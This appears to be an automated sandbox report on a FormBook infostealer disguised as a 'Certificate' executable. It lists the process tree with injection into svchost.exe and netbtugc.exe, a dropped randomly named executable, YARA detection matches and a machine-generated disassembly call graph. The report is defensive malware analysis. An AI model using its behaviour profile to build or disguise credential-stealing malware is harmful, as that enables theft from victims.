                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:01:48:57
                                                                            Start date:22/11/2024
                                                                            Path:C:\Users\user\Desktop\Certificate 11-21AIS.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Certificate 11-21AIS.exe"
                                                                            Imagebase:0x8c0000
                                                                            File size:1'189'888 bytes
                                                                            MD5 hash:8B68068B577B39F51DEE9C3703AC8999
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:1
                                                                            Start time:01:48:59
                                                                            Start date:22/11/2024
                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Certificate 11-21AIS.exe"
                                                                            Imagebase:0x660000
                                                                            File size:46'504 bytes
                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1823875661.0000000003590000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1823875661.0000000003590000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1823341522.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1823341522.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1824475216.0000000005200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1824475216.0000000005200000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:2
                                                                            Start time:01:49:05
                                                                            Start date:22/11/2024
                                                                            Path:C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe"
                                                                            Imagebase:0x980000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4144911596.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4144911596.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:3
                                                                            Start time:01:49:06
                                                                            Start date:22/11/2024
                                                                            Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                            Imagebase:0x420000
                                                                            File size:22'016 bytes
                                                                            MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4143480328.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4143480328.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4143880613.0000000003030000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4143880613.0000000003030000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4144988043.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4144988043.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:5
                                                                            Start time:01:49:20
                                                                            Start date:22/11/2024
                                                                            Path:C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe"
                                                                            Imagebase:0x980000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4146974677.0000000005870000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4146974677.0000000005870000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:8
                                                                            Start time:01:49:32
                                                                            Start date:22/11/2024
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x7ff6bf500000
                                                                            File size:676'768 bytes
                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:3.9%
                                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                                              Signature Coverage:6.9%
                                                                              Total number of Nodes:2000
                                                                              Total number of Limit Nodes:161
                                                                              execution_graph 93016 8e5dfd 93017 8e5e09 __freefls@4 93016->93017 93053 8e7eeb GetStartupInfoW 93017->93053 93019 8e5e0e 93055 8e9ca7 GetProcessHeap 93019->93055 93021 8e5e66 93022 8e5e71 93021->93022 93140 8e5f4d 47 API calls 3 library calls 93021->93140 93056 8e7b47 93022->93056 93025 8e5e77 93026 8e5e82 __RTC_Initialize 93025->93026 93141 8e5f4d 47 API calls 3 library calls 93025->93141 93077 8eacb3 93026->93077 93029 8e5e91 93030 8e5e9d GetCommandLineW 93029->93030 93142 8e5f4d 47 API calls 3 library calls 93029->93142 93096 8f2e7d GetEnvironmentStringsW 93030->93096 93034 8e5e9c 93034->93030 93037 8e5ec2 93109 8f2cb4 93037->93109 93040 8e5ec8 93041 8e5ed3 93040->93041 93144 8e115b 47 API calls 3 library calls 93040->93144 93123 8e1195 93041->93123 93044 8e5edb 93045 8e5ee6 __wwincmdln 93044->93045 93145 8e115b 47 API calls 3 library calls 93044->93145 93127 8c3a0f 93045->93127 93048 8e5efa 93049 8e5f09 93048->93049 93146 8e13f1 47 API calls _doexit 93048->93146 93147 8e1186 47 API calls _doexit 93049->93147 93052 8e5f0e __freefls@4 93054 8e7f01 93053->93054 93054->93019 93055->93021 93148 8e123a 30 API calls 2 library calls 93056->93148 93058 8e7b4c 93149 8e7e23 InitializeCriticalSectionAndSpinCount 93058->93149 93060 8e7b51 93061 8e7b55 93060->93061 93151 8e7e6d TlsAlloc 93060->93151 93150 8e7bbd 50 API calls 2 library calls 93061->93150 93064 8e7b67 93064->93061 93066 8e7b72 93064->93066 93065 8e7b5a 93065->93025 93152 8e6986 93066->93152 93069 8e7bb4 93160 8e7bbd 50 API calls 2 library calls 93069->93160 93072 8e7b93 93072->93069 93074 8e7b99 93072->93074 93073 8e7bb9 93073->93025 93159 8e7a94 47 API calls 4 library calls 93074->93159 93076 8e7ba1 GetCurrentThreadId 93076->93025 93078 8eacbf __freefls@4 93077->93078 93169 8e7cf4 93078->93169 93080 8eacc6 93081 8e6986 __calloc_crt 47 API calls 93080->93081 93083 8eacd7 93081->93083 93082 8ead42 GetStartupInfoW 93091 8eae80 93082->93091 93093 8ead57 93082->93093 93083->93082 93084 8eace2 @_EH4_CallFilterFunc@8 __freefls@4 93083->93084 93084->93029 93085 8eaf44 93176 8eaf58 LeaveCriticalSection _doexit 93085->93176 93087 8eaec9 GetStdHandle 93087->93091 93088 8e6986 __calloc_crt 47 API calls 93088->93093 93089 8eaedb GetFileType 93089->93091 93090 8eada5 93090->93091 93094 8eadd7 GetFileType 93090->93094 93095 8eade5 InitializeCriticalSectionAndSpinCount 93090->93095 93091->93085 93091->93087 93091->93089 93092 8eaf08 InitializeCriticalSectionAndSpinCount 93091->93092 93092->93091 93093->93088 93093->93090 93093->93091 93094->93090 93094->93095 93095->93090 93097 8f2e8e 93096->93097 93098 8e5ead 93096->93098 93215 8e69d0 47 API calls _W_store_winword 93097->93215 93103 8f2a7b GetModuleFileNameW 93098->93103 93101 8f2eca FreeEnvironmentStringsW 93101->93098 93102 8f2eb4 ___crtGetEnvironmentStringsW 93102->93101 93104 8f2aaf _wparse_cmdline 93103->93104 93105 8e5eb7 93104->93105 93106 8f2ae9 93104->93106 93105->93037 93143 8e115b 47 API calls 3 library calls 93105->93143 93216 8e69d0 47 API calls _W_store_winword 93106->93216 93108 8f2aef _wparse_cmdline 93108->93105 93110 8f2ccd __wsetenvp 93109->93110 93114 8f2cc5 93109->93114 93111 8e6986 __calloc_crt 47 API calls 93110->93111 93112 8f2cf6 __wsetenvp 93111->93112 93112->93114 93115 8f2d4d 93112->93115 93116 8e6986 __calloc_crt 47 API calls 93112->93116 93117 8f2d72 93112->93117 93120 8f2d89 93112->93120 93217 8f2567 47 API calls _xtow_s@20 93112->93217 93113 8e1c9d _free 47 API calls 93113->93114 93114->93040 93115->93113 93116->93112 93119 8e1c9d _free 47 API calls 93117->93119 93119->93114 93218 8e6e20 IsProcessorFeaturePresent 93120->93218 93122 8f2d95 93122->93040 93124 8e11a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 93123->93124 93126 8e11e0 __IsNonwritableInCurrentImage 93124->93126 93241 8e0f0a 52 API calls __cinit 93124->93241 93126->93044 93128 8c3a29 93127->93128 93129 931ebf 93127->93129 93130 8c3a63 IsThemeActive 93128->93130 93242 8e1405 93130->93242 93134 8c3a8f 93254 8c3adb SystemParametersInfoW SystemParametersInfoW 93134->93254 93136 8c3a9b 93255 8c3d19 93136->93255 93138 8c3aa3 SystemParametersInfoW 93139 8c3ac8 93138->93139 93139->93048 93140->93022 93141->93026 93142->93034 93146->93049 93147->93052 93148->93058 93149->93060 93150->93065 93151->93064 93155 8e698d 93152->93155 93154 8e69ca 93154->93069 93158 8e7ec9 TlsSetValue 93154->93158 93155->93154 93156 8e69ab Sleep 93155->93156 93161 8f30aa 93155->93161 93157 8e69c2 93156->93157 93157->93154 93157->93155 93158->93072 93159->93076 93160->93073 93162 8f30b5 93161->93162 93167 8f30d0 __calloc_impl 93161->93167 93163 8f30c1 93162->93163 93162->93167 93168 8e7c0e 47 API calls __getptd_noexit 93163->93168 93165 8f30e0 RtlAllocateHeap 93166 8f30c6 93165->93166 93165->93167 93166->93155 93167->93165 93167->93166 93168->93166 93170 8e7d18 EnterCriticalSection 93169->93170 93171 8e7d05 93169->93171 93170->93080 93177 8e7d7c 93171->93177 93173 8e7d0b 93173->93170 93201 8e115b 47 API calls 3 library calls 93173->93201 93176->93084 93178 8e7d88 __freefls@4 93177->93178 93179 8e7da9 93178->93179 93180 8e7d91 93178->93180 93186 8e7e11 __freefls@4 93179->93186 93195 8e7da7 93179->93195 93202 8e81c2 47 API calls 2 library calls 93180->93202 93182 8e7d96 93203 8e821f 47 API calls 7 library calls 93182->93203 93184 8e7dbd 93187 8e7dc4 93184->93187 93188 8e7dd3 93184->93188 93186->93173 93206 8e7c0e 47 API calls __getptd_noexit 93187->93206 93191 8e7cf4 __lock 46 API calls 93188->93191 93189 8e7d9d 93204 8e1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93189->93204 93194 8e7dda 93191->93194 93193 8e7dc9 93193->93186 93196 8e7dfe 93194->93196 93197 8e7de9 InitializeCriticalSectionAndSpinCount 93194->93197 93195->93179 93205 8e69d0 47 API calls _W_store_winword 93195->93205 93207 8e1c9d 93196->93207 93198 8e7e04 93197->93198 93213 8e7e1a LeaveCriticalSection _doexit 93198->93213 93202->93182 93203->93189 93205->93184 93206->93193 93208 8e1ca6 RtlFreeHeap 93207->93208 93209 8e1ccf _free 93207->93209 93208->93209 93210 8e1cbb 93208->93210 93209->93198 93214 8e7c0e 47 API calls __getptd_noexit 93210->93214 93212 8e1cc1 GetLastError 93212->93209 93213->93186 93214->93212 93215->93102 93216->93108 93217->93112 93219 8e6e2b 93218->93219 93224 8e6cb5 93219->93224 93223 8e6e46 93223->93122 93225 8e6ccf _memset __call_reportfault 93224->93225 93226 8e6cef IsDebuggerPresent 93225->93226 93232 8e81ac SetUnhandledExceptionFilter UnhandledExceptionFilter 93226->93232 93228 8e6db3 __call_reportfault 93233 8ea70c 93228->93233 93230 8e6dd6 93231 8e8197 GetCurrentProcess TerminateProcess 93230->93231 93231->93223 93232->93228 93234 8ea716 IsProcessorFeaturePresent 93233->93234 93235 8ea714 93233->93235 93237 8f37b0 93234->93237 93235->93230 93240 8f375f 5 API calls 2 library calls 93237->93240 93239 8f3893 93239->93230 93240->93239 93241->93126 93243 8e7cf4 __lock 47 API calls 93242->93243 93244 8e1410 93243->93244 93307 8e7e58 LeaveCriticalSection 93244->93307 93246 8c3a88 93247 8e146d 93246->93247 93248 8e1477 93247->93248 93249 8e1491 93247->93249 93248->93249 93308 8e7c0e 47 API calls __getptd_noexit 93248->93308 93249->93134 93251 8e1481 93309 8e6e10 8 API calls _xtow_s@20 93251->93309 93253 8e148c 93253->93134 93254->93136 93256 8c3d26 __ftell_nolock 93255->93256 93310 8cd7f7 93256->93310 93260 8c3d57 IsDebuggerPresent 93261 931cc1 MessageBoxA 93260->93261 93262 8c3d65 93260->93262 93263 931cd9 93261->93263 93262->93263 93264 8c3d82 93262->93264 93293 8c3e3a 93262->93293 93512 8dc682 48 API calls 93263->93512 93389 8c40e5 93264->93389 93265 8c3e41 SetCurrentDirectoryW 93270 8c3e4e Mailbox 93265->93270 93269 8c3da0 GetFullPathNameW 93405 8c6a63 93269->93405 93270->93138 93271 931ce9 93274 931cff SetCurrentDirectoryW 93271->93274 93273 8c3ddb 93416 8c6430 93273->93416 93274->93270 93277 8c3df6 93278 8c3e00 93277->93278 93513 9071fa AllocateAndInitializeSid CheckTokenMembership FreeSid 93277->93513 93432 8c3e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 93278->93432 93281 931d1c 93281->93278 93284 931d2d 93281->93284 93514 8c5374 93284->93514 93285 8c3e0a 93287 8c3e1f 93285->93287 93440 8c4ffc 93285->93440 93450 8ce8d0 93287->93450 93289 931d35 93521 8cce19 93289->93521 93293->93265 93294 931d42 93296 931d49 93294->93296 93297 931d6e 93294->93297 93527 8c518c 93296->93527 93299 8c518c 48 API calls 93297->93299 93301 931d6a GetForegroundWindow ShellExecuteW 93299->93301 93305 931d9e Mailbox 93301->93305 93305->93293 93306 8c518c 48 API calls 93306->93301 93307->93246 93308->93251 93309->93253 93546 8df4ea 93310->93546 93312 8cd818 93313 8df4ea 48 API calls 93312->93313 93314 8c3d31 GetCurrentDirectoryW 93313->93314 93315 8c61ca 93314->93315 93577 8de99b 93315->93577 93319 8c61eb 93320 8c5374 50 API calls 93319->93320 93321 8c61ff 93320->93321 93322 8cce19 48 API calls 93321->93322 93323 8c620c 93322->93323 93594 8c39db 93323->93594 93325 8c6216 Mailbox 93606 8c6eed 93325->93606 93330 8cce19 48 API calls 93331 8c6244 93330->93331 93613 8cd6e9 93331->93613 93333 8c6254 Mailbox 93334 8cce19 48 API calls 93333->93334 93335 8c627c 93334->93335 93336 8cd6e9 55 API calls 93335->93336 93337 8c628f Mailbox 93336->93337 93338 8cce19 48 API calls 93337->93338 93339 8c62a0 93338->93339 93617 8cd645 93339->93617 93341 8c62b2 Mailbox 93342 8cd7f7 48 API calls 93341->93342 93343 8c62c5 93342->93343 93627 8c63fc 93343->93627 93347 8c62df 93348 8c62e9 93347->93348 93349 931c08 93347->93349 93350 8e0fa7 _W_store_winword 59 API calls 93348->93350 93351 8c63fc 48 API calls 93349->93351 93352 8c62f4 93350->93352 93353 931c1c 93351->93353 93352->93353 93354 8c62fe 93352->93354 93356 8c63fc 48 API calls 93353->93356 93355 8e0fa7 _W_store_winword 59 API calls 93354->93355 93358 8c6309 93355->93358 93357 931c38 93356->93357 93360 8c5374 50 API calls 93357->93360 93358->93357 93359 8c6313 93358->93359 93361 8e0fa7 _W_store_winword 59 API calls 93359->93361 93362 931c5d 93360->93362 93363 8c631e 93361->93363 93364 8c63fc 48 API calls 93362->93364 93365 8c635f 93363->93365 93367 931c86 93363->93367 93370 8c63fc 48 API calls 93363->93370 93368 931c69 93364->93368 93366 8c636c 93365->93366 93365->93367 93643 8dc050 93366->93643 93371 8c6eed 48 API calls 93367->93371 93369 8c6eed 48 API calls 93368->93369 93374 931c77 93369->93374 93375 8c6342 93370->93375 93372 931ca8 93371->93372 93376 8c63fc 48 API calls 93372->93376 93378 8c63fc 48 API calls 93374->93378 93379 8c6eed 48 API calls 93375->93379 93381 931cb5 93376->93381 93377 8c6384 93654 8d1b90 93377->93654 93378->93367 93380 8c6350 93379->93380 93383 8c63fc 48 API calls 93380->93383 93381->93381 93383->93365 93384 8d1b90 48 API calls 93386 8c6394 93384->93386 93386->93384 93387 8c63fc 48 API calls 93386->93387 93388 8c63d6 Mailbox 93386->93388 93670 8c6b68 48 API calls 93386->93670 93387->93386 93388->93260 93390 8c40f2 __ftell_nolock 93389->93390 93391 8c410b 93390->93391 93392 93370e _memset 93390->93392 94179 8c660f 93391->94179 93395 93372a GetOpenFileNameW 93392->93395 93397 933779 93395->93397 93398 8c6a63 48 API calls 93397->93398 93400 93378e 93398->93400 93400->93400 93402 8c4129 94204 8c4139 93402->94204 93406 8c6adf 93405->93406 93408 8c6a6f __wsetenvp 93405->93408 93407 8cb18b 48 API calls 93406->93407 93415 8c6ab6 ___crtGetEnvironmentStringsW 93407->93415 93409 8c6a8b 93408->93409 93410 8c6ad7 93408->93410 94423 8c6b4a 93409->94423 94426 8cc369 48 API calls 93410->94426 93413 8c6a95 93414 8dee75 48 API calls 93413->93414 93414->93415 93415->93273 93417 8c643d __ftell_nolock 93416->93417 94427 8c4c75 93417->94427 93419 8c6442 93431 8c3dee 93419->93431 94438 8c5928 86 API calls 93419->94438 93421 8c644f 93421->93431 94439 8c5798 88 API calls Mailbox 93421->94439 93423 8c6458 93424 8c645c GetFullPathNameW 93423->93424 93423->93431 93425 8c6a63 48 API calls 93424->93425 93426 8c6488 93425->93426 93427 8c6a63 48 API calls 93426->93427 93428 8c6495 93427->93428 93429 935dcf _wcscat 93428->93429 93430 8c6a63 48 API calls 93428->93430 93430->93431 93431->93271 93431->93277 93433 8c3ed8 93432->93433 93434 931cba 93432->93434 94486 8c4024 93433->94486 93438 8c3e05 93439 8c36b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 93438->93439 93439->93285 93441 8c5027 _memset 93440->93441 94491 8c4c30 93441->94491 93444 8c50ac 93446 8c50ca Shell_NotifyIconW 93444->93446 93447 933d28 Shell_NotifyIconW 93444->93447 94495 8c51af 93446->94495 93449 8c50df 93449->93287 93451 8ce8f6 93450->93451 93510 8ce906 Mailbox 93450->93510 93452 8ced52 93451->93452 93451->93510 94636 8de3cd 335 API calls 93452->94636 93454 8cebc7 93455 8c3e2a 93454->93455 94637 8c2ff6 16 API calls 93454->94637 93455->93293 93511 8c3847 Shell_NotifyIconW _memset 93455->93511 93457 8ced63 93457->93455 93458 8ced70 93457->93458 94638 8de312 335 API calls Mailbox 93458->94638 93459 8ce94c PeekMessageW 93459->93510 93461 93526e Sleep 93461->93510 93462 8ced77 LockWindowUpdate DestroyWindow GetMessageW 93462->93455 93464 8ceda9 93462->93464 93465 9359ef TranslateMessage DispatchMessageW GetMessageW 93464->93465 93465->93465 93467 935a1f 93465->93467 93467->93455 93468 8ced21 PeekMessageW 93468->93510 93469 8c1caa 49 API calls 93469->93510 93470 8cebf7 timeGetTime 93470->93510 93472 8df4ea 48 API calls 93472->93510 93473 8c6eed 48 API calls 93473->93510 93474 8ced3a TranslateMessage DispatchMessageW 93474->93468 93475 935557 WaitForSingleObject 93477 935574 GetExitCodeProcess CloseHandle 93475->93477 93475->93510 93476 93588f Sleep 93504 935429 Mailbox 93476->93504 93477->93510 93478 8cd7f7 48 API calls 93478->93504 93479 8cedae timeGetTime 94639 8c1caa 49 API calls 93479->94639 93480 935733 Sleep 93480->93504 93484 935926 GetExitCodeProcess 93489 935952 CloseHandle 93484->93489 93490 93593c WaitForSingleObject 93484->93490 93486 8c2aae 311 API calls 93486->93510 93487 8ddc38 timeGetTime 93487->93504 93488 935445 Sleep 93488->93510 93489->93504 93490->93489 93490->93510 93491 935432 Sleep 93491->93488 93492 928c4b 108 API calls 93492->93504 93493 8c2c79 107 API calls 93493->93504 93495 9359ae Sleep 93495->93510 93498 8cce19 48 API calls 93498->93504 93501 8cd6e9 55 API calls 93501->93504 93504->93478 93504->93484 93504->93487 93504->93488 93504->93491 93504->93492 93504->93493 93504->93495 93504->93498 93504->93501 93504->93510 94641 904cbe 49 API calls Mailbox 93504->94641 94642 8c1caa 49 API calls 93504->94642 94643 8c2aae 335 API calls 93504->94643 94673 91ccb2 50 API calls 93504->94673 94674 907a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 93504->94674 94675 906532 63 API calls 3 library calls 93504->94675 93506 8cce19 48 API calls 93506->93510 93507 90cc5c 86 API calls 93507->93510 93509 8cd6e9 55 API calls 93509->93510 93510->93454 93510->93459 93510->93461 93510->93468 93510->93469 93510->93470 93510->93472 93510->93473 93510->93474 93510->93475 93510->93476 93510->93479 93510->93480 93510->93486 93510->93488 93510->93504 93510->93506 93510->93507 93510->93509 94518 8cef00 93510->94518 94525 8cf110 93510->94525 94590 8d45e0 93510->94590 94607 8ceed0 335 API calls Mailbox 93510->94607 94608 8d3200 93510->94608 94634 8de244 TranslateAcceleratorW 93510->94634 94635 8ddc5f IsDialogMessageW GetClassLongW 93510->94635 94640 928d23 48 API calls 93510->94640 94644 8cfe30 93510->94644 93511->93293 93512->93271 93513->93281 93515 8ef8a0 __ftell_nolock 93514->93515 93516 8c5381 GetModuleFileNameW 93515->93516 93517 8cce19 48 API calls 93516->93517 93518 8c53a7 93517->93518 93519 8c660f 49 API calls 93518->93519 93520 8c53b1 Mailbox 93519->93520 93520->93289 93522 8cce28 __wsetenvp 93521->93522 93523 8dee75 48 API calls 93522->93523 93524 8cce50 ___crtGetEnvironmentStringsW 93523->93524 93525 8df4ea 48 API calls 93524->93525 93526 8cce66 93525->93526 93526->93294 93528 8c5197 93527->93528 93529 8c519f 93528->93529 93530 931ace 93528->93530 94958 8c5130 93529->94958 93532 8c6b4a 48 API calls 93530->93532 93534 931adb __wsetenvp 93532->93534 93533 8c51aa 93537 8c510d 93533->93537 93535 8dee75 48 API calls 93534->93535 93536 931b07 ___crtGetEnvironmentStringsW 93535->93536 93538 8c511f 93537->93538 93539 931be7 93537->93539 94968 8cb384 93538->94968 94977 8fa58f 48 API calls ___crtGetEnvironmentStringsW 93539->94977 93542 8c512b 93542->93306 93543 931bf1 93544 8c6eed 48 API calls 93543->93544 93545 931bf9 Mailbox 93544->93545 93549 8df4f2 __calloc_impl 93546->93549 93548 8df50c 93548->93312 93549->93548 93550 8df50e std::exception::exception 93549->93550 93555 8e395c 93549->93555 93569 8e6805 RaiseException 93550->93569 93552 8df538 93570 8e673b 47 API calls _free 93552->93570 93554 8df54a 93554->93312 93556 8e39d7 __calloc_impl 93555->93556 93561 8e3968 __calloc_impl 93555->93561 93576 8e7c0e 47 API calls __getptd_noexit 93556->93576 93559 8e399b RtlAllocateHeap 93559->93561 93568 8e39cf 93559->93568 93561->93559 93562 8e3973 93561->93562 93563 8e39c3 93561->93563 93566 8e39c1 93561->93566 93562->93561 93571 8e81c2 47 API calls 2 library calls 93562->93571 93572 8e821f 47 API calls 7 library calls 93562->93572 93573 8e1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93562->93573 93574 8e7c0e 47 API calls __getptd_noexit 93563->93574 93575 8e7c0e 47 API calls __getptd_noexit 93566->93575 93568->93549 93569->93552 93570->93554 93571->93562 93572->93562 93574->93566 93575->93568 93576->93568 93578 8cd7f7 48 API calls 93577->93578 93579 8c61db 93578->93579 93580 8c6009 93579->93580 93581 8c6016 __ftell_nolock 93580->93581 93582 8c6a63 48 API calls 93581->93582 93587 8c617c Mailbox 93581->93587 93584 8c6048 93582->93584 93592 8c607e Mailbox 93584->93592 93671 8c61a6 93584->93671 93585 8c614f 93586 8cce19 48 API calls 93585->93586 93585->93587 93589 8c6170 93586->93589 93587->93319 93588 8cce19 48 API calls 93588->93592 93590 8c64cf 48 API calls 93589->93590 93590->93587 93592->93585 93592->93587 93592->93588 93593 8c61a6 48 API calls 93592->93593 93674 8c64cf 93592->93674 93593->93592 93697 8c41a9 93594->93697 93597 8c3a06 93597->93325 93600 8e1c9d _free 47 API calls 93603 932ffd 93600->93603 93602 932ff0 93602->93600 93604 8c4252 84 API calls 93603->93604 93605 933006 93604->93605 93605->93605 93607 8c6ef8 93606->93607 93608 8c622b 93606->93608 94167 8cdd47 48 API calls ___crtGetEnvironmentStringsW 93607->94167 93610 8c9048 93608->93610 93611 8df4ea 48 API calls 93610->93611 93612 8c6237 93611->93612 93612->93330 93614 8cd6f4 93613->93614 93615 8cd71b 93614->93615 94168 8cd764 55 API calls 93614->94168 93615->93333 93618 8cd654 93617->93618 93625 8cd67e 93617->93625 93619 8cd65b 93618->93619 93621 8cd6c2 93618->93621 93620 8cd666 